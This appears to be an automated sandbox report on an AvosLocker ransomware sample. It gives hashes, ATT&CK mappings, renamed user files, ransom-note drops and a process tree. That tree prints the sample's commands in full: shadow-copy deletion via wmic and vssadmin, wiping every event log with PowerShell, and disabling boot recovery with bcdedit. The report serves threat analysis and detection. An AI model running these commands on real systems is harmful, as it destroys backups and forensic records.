avoslocker | 1198fb9117776809b11a19000161377384957bee846f7b25a610fc8ca082eb37

Resubmissions

11-05-2023 15:49

230511-s9f6zsad87 10

11-05-2023 15:45

230511-s7b49agc64 10

03-05-2023 23:25

230503-3edsgsba4x 10

03-05-2023 11:43

230503-nv3n8aee94 10

Analysis

max time kernel
85s
max time network
36s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
11-05-2023 15:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
Size

807KB
MD5

1a23dd405a1bd4e488c5fb54f22e14ff
SHA1

73b1d319fb361e591c2e6a65caaea73186f51193
SHA256

5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa
SHA512

b9ff21124e04ec7c9e5159cc7cc8ce1110b35941c7a1235b4bd55911ad17c03ace3ce1173e784e6154b09a6eb21da880b7f54886bda589e6293e69d92337f80b
SSDEEP

12288:0Z4s3rg9u/2/oT+NXtHLlP/O+OeO+OeNhBBhhBBAtHg9rjI+LXJ0ivlzkHBDsYA:u4s+oT+NXBLi0rjFXvyHBlb4CZa8

Score

10^/10

avoslocker evasion ransomware

Malware Config

Signatures

Avoslocker Ransomware
Avoslocker is a relatively new ransomware, that was observed in late June and early July, 2021.
ransomware avoslocker
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
1796	bcdedit.exe
2532	bcdedit.exe

Modifies extensions of user files 15 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File opened for modification	C:\Users\Admin\Pictures\StartUnlock.tiff	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File opened for modification	C:\Users\Admin\Pictures\CopyMove.tiff	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File renamed	C:\Users\Admin\Pictures\CopyMove.tiff => C:\Users\Admin\Pictures\CopyMove.tiff.avos2	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File renamed	C:\Users\Admin\Pictures\InvokeConvertFrom.png => C:\Users\Admin\Pictures\InvokeConvertFrom.png.avos2	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File renamed	C:\Users\Admin\Pictures\ReceiveDeny.crw => C:\Users\Admin\Pictures\ReceiveDeny.crw.avos2	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File renamed	C:\Users\Admin\Pictures\SendPublish.tiff => C:\Users\Admin\Pictures\SendPublish.tiff.avos2	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File opened for modification	C:\Users\Admin\Pictures\SendPublish.tiff	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File renamed	C:\Users\Admin\Pictures\StartUnlock.tiff => C:\Users\Admin\Pictures\StartUnlock.tiff.avos2	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File renamed	C:\Users\Admin\Pictures\RenameRemove.crw => C:\Users\Admin\Pictures\RenameRemove.crw.avos2	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File renamed	C:\Users\Admin\Pictures\WaitResume.tif => C:\Users\Admin\Pictures\WaitResume.tif.avos2	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File renamed	C:\Users\Admin\Pictures\UnprotectExport.png => C:\Users\Admin\Pictures\UnprotectExport.png.avos2	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File opened for modification	C:\Users\Admin\Pictures\ExitConfirm.tiff	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File renamed	C:\Users\Admin\Pictures\ExitConfirm.tiff => C:\Users\Admin\Pictures\ExitConfirm.tiff.avos2	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File renamed	C:\Users\Admin\Pictures\PushSet.crw => C:\Users\Admin\Pictures\PushSet.crw.avos2	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File renamed	C:\Users\Admin\Pictures\ProtectWatch.png => C:\Users\Admin\Pictures\ProtectWatch.png.avos2	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe

Drops desktop.ini file(s) 1 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\Z:	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1521733757.png"	reg.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\VeriSignLogo.jpg	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ne\GET_YOUR_FILES_BACK.txt	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File opened for modification	C:\Program Files\Microsoft Games\Multiplayer\Spades\it-IT\ShvlRes.dll.mui	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Santa_Isabel	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\fr-FR\css\GET_YOUR_FILES_BACK.txt	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105846.WMF	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\TextConv\Wks9Pxy.cnv	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_blue_windy.png	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DissolveNoise.png	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File created	C:\Program Files (x86)\Common Files\System\Ole DB\GET_YOUR_FILES_BACK.txt	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\en-US\js\GET_YOUR_FILES_BACK.txt	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_left_disabled.png	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File created	C:\Program Files\VideoLAN\VLC\locale\uk\LC_MESSAGES\GET_YOUR_FILES_BACK.txt	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File opened for modification	C:\Program Files\Java\jre7\lib\ext\meta-index	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler_1.2.0.v20140422-1847.jar	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Extensions\external_extensions.json	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\logo.png	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\FLY98SP.POC	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File created	C:\Program Files (x86)\Common Files\microsoft shared\Help\1036\GET_YOUR_FILES_BACK.txt	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Indiana\Knox	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.nl_ja_4.4.0.v20140623020002.jar	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Guam	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_MoveNoDrop32x32.gif	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\colorcycle.png	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.SE.XML	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\STS2\GET_YOUR_FILES_BACK.txt	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107262.WMF	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PSSKETSM.WMF	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waning-crescent.png	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-windows.xml	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Khandyga	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File opened for modification	C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\es-ES\js\RSSFeeds.js	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File created	C:\Program Files\VideoLAN\VLC\locale\as_IN\GET_YOUR_FILES_BACK.txt	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-attach.jar	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-options_ja.jar	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File created	C:\Program Files\Common Files\System\Ole DB\de-DE\GET_YOUR_FILES_BACK.txt	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\144DPI\(144DPI)redStateIcon.png	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File opened for modification	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\LoginForm.zip	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\Things\GET_YOUR_FILES_BACK.txt	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SY00110_.WMF	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\fr-FR\js\settings.js	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\es-ES\js\calendar.js	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\calendar_single_orange.png	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File opened for modification	C:\Program Files (x86)\Windows Media Player\fr-FR\wmlaunch.exe.mui	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\LINE.JPG	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\EXPEDITN\PREVIEW.GIF	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\it-IT\js\settings.js	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\prev_rest.png	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\ja-JP\settings.html	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\trad.png	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File created	C:\Program Files\VideoLAN\VLC\locale\km\GET_YOUR_FILES_BACK.txt	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\LICENSE	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\EST	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\mip.exe.mui	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\BodyPaneBackground.jpg	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\Certificates\Verisign\Components\VeriSign_Class_3_Public_Primary_CA.cer	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN01184_.WMF	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0187851.WMF	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\en-US\GET_YOUR_FILES_BACK.txt	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierBackgroundRTL.jpg	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME27.CSS	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
2188	vssadmin.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
2944	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
1084	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
2504	powershell.exe
2788	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeTakeOwnershipPrivilege	1084	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
Token: SeIncreaseQuotaPrivilege	3016	WMIC.exe
Token: SeSecurityPrivilege	3016	WMIC.exe
Token: SeTakeOwnershipPrivilege	3016	WMIC.exe
Token: SeLoadDriverPrivilege	3016	WMIC.exe
Token: SeSystemProfilePrivilege	3016	WMIC.exe
Token: SeSystemtimePrivilege	3016	WMIC.exe
Token: SeProfSingleProcessPrivilege	3016	WMIC.exe
Token: SeIncBasePriorityPrivilege	3016	WMIC.exe
Token: SeCreatePagefilePrivilege	3016	WMIC.exe
Token: SeBackupPrivilege	3016	WMIC.exe
Token: SeRestorePrivilege	3016	WMIC.exe
Token: SeShutdownPrivilege	3016	WMIC.exe
Token: SeDebugPrivilege	3016	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3016	WMIC.exe
Token: SeRemoteShutdownPrivilege	3016	WMIC.exe
Token: SeUndockPrivilege	3016	WMIC.exe
Token: SeManageVolumePrivilege	3016	WMIC.exe
Token: 33	3016	WMIC.exe
Token: 34	3016	WMIC.exe
Token: 35	3016	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3016	WMIC.exe
Token: SeSecurityPrivilege	3016	WMIC.exe
Token: SeTakeOwnershipPrivilege	3016	WMIC.exe
Token: SeLoadDriverPrivilege	3016	WMIC.exe
Token: SeSystemProfilePrivilege	3016	WMIC.exe
Token: SeSystemtimePrivilege	3016	WMIC.exe
Token: SeProfSingleProcessPrivilege	3016	WMIC.exe
Token: SeIncBasePriorityPrivilege	3016	WMIC.exe
Token: SeCreatePagefilePrivilege	3016	WMIC.exe
Token: SeBackupPrivilege	3016	WMIC.exe
Token: SeRestorePrivilege	3016	WMIC.exe
Token: SeShutdownPrivilege	3016	WMIC.exe
Token: SeDebugPrivilege	3016	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3016	WMIC.exe
Token: SeRemoteShutdownPrivilege	3016	WMIC.exe
Token: SeUndockPrivilege	3016	WMIC.exe
Token: SeManageVolumePrivilege	3016	WMIC.exe
Token: 33	3016	WMIC.exe
Token: 34	3016	WMIC.exe
Token: 35	3016	WMIC.exe
Token: SeDebugPrivilege	2504	powershell.exe
Token: SeBackupPrivilege	2468	vssvc.exe
Token: SeRestorePrivilege	2468	vssvc.exe
Token: SeAuditPrivilege	2468	vssvc.exe
Token: SeBackupPrivilege	2504	powershell.exe
Token: SeSecurityPrivilege	2504	powershell.exe
Token: SeBackupPrivilege	2504	powershell.exe
Token: SeBackupPrivilege	2504	powershell.exe
Token: SeSecurityPrivilege	2504	powershell.exe
Token: SeBackupPrivilege	2504	powershell.exe
Token: SeBackupPrivilege	2504	powershell.exe
Token: SeSecurityPrivilege	2504	powershell.exe
Token: SeBackupPrivilege	2504	powershell.exe
Token: SeBackupPrivilege	2504	powershell.exe
Token: SeSecurityPrivilege	2504	powershell.exe
Token: SeBackupPrivilege	2504	powershell.exe
Token: SeBackupPrivilege	2504	powershell.exe
Token: SeSecurityPrivilege	2504	powershell.exe
Token: SeBackupPrivilege	2504	powershell.exe
Token: SeBackupPrivilege	2504	powershell.exe
Token: SeSecurityPrivilege	2504	powershell.exe
Token: SeBackupPrivilege	2504	powershell.exe
Token: SeSecurityPrivilege	2504	powershell.exe

Suspicious use of WriteProcessMemory 45 IoCs

description	pid	Process	procid_target
PID 1084 wrote to memory of 2016	1084	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe	27
PID 1084 wrote to memory of 2016	1084	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe	27
PID 1084 wrote to memory of 2016	1084	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe	27
PID 1084 wrote to memory of 2016	1084	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe	27
PID 1084 wrote to memory of 2008	1084	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe	28
PID 1084 wrote to memory of 2008	1084	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe	28
PID 1084 wrote to memory of 2008	1084	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe	28
PID 1084 wrote to memory of 2008	1084	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe	28
PID 1084 wrote to memory of 1476	1084	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe	31
PID 1084 wrote to memory of 1476	1084	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe	31
PID 1084 wrote to memory of 1476	1084	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe	31
PID 1084 wrote to memory of 1476	1084	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe	31
PID 1084 wrote to memory of 1756	1084	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe	30
PID 1084 wrote to memory of 1756	1084	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe	30
PID 1084 wrote to memory of 1756	1084	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe	30
PID 1084 wrote to memory of 1756	1084	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe	30
PID 1084 wrote to memory of 872	1084	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe	29
PID 1084 wrote to memory of 872	1084	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe	29
PID 1084 wrote to memory of 872	1084	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe	29
PID 1084 wrote to memory of 872	1084	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe	29
PID 1756 wrote to memory of 1796	1756	cmd.exe	32
PID 1756 wrote to memory of 1796	1756	cmd.exe	32
PID 1756 wrote to memory of 1796	1756	cmd.exe	32
PID 2008 wrote to memory of 2188	2008	cmd.exe	33
PID 2008 wrote to memory of 2188	2008	cmd.exe	33
PID 2008 wrote to memory of 2188	2008	cmd.exe	33
PID 872 wrote to memory of 2504	872	cmd.exe	34
PID 872 wrote to memory of 2504	872	cmd.exe	34
PID 872 wrote to memory of 2504	872	cmd.exe	34
PID 2016 wrote to memory of 3016	2016	cmd.exe	35
PID 2016 wrote to memory of 3016	2016	cmd.exe	35
PID 2016 wrote to memory of 3016	2016	cmd.exe	35
PID 1476 wrote to memory of 2532	1476	cmd.exe	36
PID 1476 wrote to memory of 2532	1476	cmd.exe	36
PID 1476 wrote to memory of 2532	1476	cmd.exe	36
PID 1084 wrote to memory of 2788	1084	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe	43
PID 1084 wrote to memory of 2788	1084	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe	43
PID 1084 wrote to memory of 2788	1084	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe	43
PID 1084 wrote to memory of 2788	1084	5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe	43
PID 2788 wrote to memory of 2820	2788	powershell.exe	44
PID 2788 wrote to memory of 2820	2788	powershell.exe	44
PID 2788 wrote to memory of 2820	2788	powershell.exe	44
PID 2788 wrote to memory of 3416	2788	powershell.exe	45
PID 2788 wrote to memory of 3416	2788	powershell.exe	45
PID 2788 wrote to memory of 3416	2788	powershell.exe	45

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe
"C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe"
1⤵
- Modifies extensions of user files
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1084
- C:\Windows\system32\cmd.exe
  cmd /c wmic shadowcopy delete /nointeractive
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2016
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic shadowcopy delete /nointeractive
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3016
- C:\Windows\system32\cmd.exe
  cmd /c vssadmin.exe Delete Shadows /All /Quiet
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2008
- - C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /All /Quiet
    3⤵
    - Interacts with shadow copies
    PID:2188
- C:\Windows\system32\cmd.exe
  cmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:872
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2504
- C:\Windows\system32\cmd.exe
  cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1756
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:1796
- C:\Windows\system32\cmd.exe
  cmd /c bcdedit /set {default} recoveryenabled No
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1476
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} recoveryenabled No
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:2532
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
